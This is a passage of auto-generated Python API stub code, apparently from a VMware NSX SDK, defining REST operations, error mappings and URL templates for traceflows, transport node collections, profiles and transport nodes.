path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'traceflow_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/traceflows/{traceflow-id}',
path_variables={
'traceflow_id': 'traceflow-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'traceflow_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/traceflows/{traceflow-id}',
path_variables={
'traceflow_id': 'traceflow-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'lport_id': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/traceflows',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'lport_id': 'lport_id',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'Traceflow'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'Traceflow'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TraceflowListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.traceflows',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _TransportNodeCollectionsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'transport_node_collection': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-node-collections',
request_body_parameter='transport_node_collection',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'transport_node_collection_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/transport-node-collections/{transport-node-collection-id}',
path_variables={
'transport_node_collection_id': 'transport-node-collection-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'transport_node_collection_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transport-node-collections/{transport-node-collection-id}',
path_variables={
'transport_node_collection_id': 'transport-node-collection-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transport-node-collections',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'transport_node_collection_id': type.StringType(),
'transport_node_collection': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/transport-node-collections/{transport-node-collection-id}',
request_body_parameter='transport_node_collection',
path_variables={
'transport_node_collection_id': 'transport-node-collection-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollectionListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.transport_node_collections',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _TransportNodeProfilesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'transport_node_profile': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeProfile'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-node-profiles',
request_body_parameter='transport_node_profile',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'transport_node_profile_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/transport-node-profiles/{transport-node-profile-id}',
path_variables={
'transport_node_profile_id': 'transport-node-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'transport_node_profile_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transport-node-profiles/{transport-node-profile-id}',
path_variables={
'transport_node_profile_id': 'transport-node-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transport-node-profiles',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'transport_node_profile_id': type.StringType(),
'transport_node_profile': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeProfile'),
'esx_mgmt_if_migration_dest': type.OptionalType(type.StringType()),
'if_id': type.OptionalType(type.StringType()),
'ping_ip': type.OptionalType(type.StringType()),
'vnic': type.OptionalType(type.StringType()),
'vnic_migration_dest': type.OptionalType(type.StringType()),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/transport-node-profiles/{transport-node-profile-id}',
request_body_parameter='transport_node_profile',
path_variables={
'transport_node_profile_id': 'transport-node-profile-id',
},
query_parameters={
'esx_mgmt_if_migration_dest': 'esx_mgmt_if_migration_dest',
'if_id': 'if_id',
'ping_ip': 'ping_ip',
'vnic': 'vnic',
'vnic_migration_dest': 'vnic_migration_dest',
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeProfile'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeProfile'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeProfileListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeProfile'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.transport_node_profiles',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _TransportNodesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'transport_node': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-nodes',
request_body_parameter='transport_node',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'transport_node_id': type.StringType(),
'force': type.OptionalType(type.BooleanType()),
'unprepare_host': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/transport-nodes/{transport-node-id}',
path_variables={
'transport_node_id': 'transport-node-id',
},
query_parameters={
'force': 'force',
'unprepare_host': 'unprepare_host',
},
content_type='application/json'
)
# properties for deleteontransportnode operation
deleteontransportnode_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
deleteontransportnode_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
deleteontransportnode_input_value_validator_list = [
]
deleteontransportnode_output_validator_list = [
]
deleteontransportnode_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/transport-nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for disableflowcache operation
disableflowcache_input_type = type.StructType('operation-input', {
'transport_node_id': type.StringType(),
})
disableflowcache_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
disableflowcache_input_value_validator_list = [
]
disableflowcache_output_validator_list = [
]
disableflowcache_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-nodes/{transport-node-id}?action=disable_flow_cache',
path_variables={
'transport_node_id': 'transport-node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for enableflowcache operation
enableflowcache_input_type = type.StructType('operation-input', {
'transport_node_id': type.StringType(),
})
enableflowcache_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
enableflowcache_input_value_validator_list = [
]
enableflowcache_output_validator_list = [
]
enableflowcache_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-nodes/{transport-node-id}?action=enable_flow_cache',
path_variables={
'transport_node_id': 'transport-node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'transport_node_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transport-nodes/{transport-node-id}',
path_variables={
'transport_node_id': 'transport-node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for getontransportnode operation
getontransportnode_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
getontransportnode_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
getontransportnode_input_value_validator_list = [
]
getontransportnode_output_validator_list = [
]
getontransportnode_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transport-nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'in_maintenance_mode': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'node_id': type.OptionalType(type.StringType()),
'node_ip': type.OptionalType(type.StringType()),
'node_types': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'transport_zone_id': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transport-nodes',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'in_maintenance_mode': 'in_maintenance_mode',
'included_fields': 'included_fields',
'node_id': 'node_id',
'node_ip': 'node_ip',
'node_types': 'node_types',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'transport_zone_id': 'transport_zone_id',
},
content_type='application/json'
)
# properties for postontransportnode operation
postontransportnode_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
postontransportnode_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
postontransportnode_input_value_validator_list = [
]
postontransportnode_output_validator_list = [
]
postontransportnode_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for putontransportnode operation
putontransportnode_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
putontransportnode_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
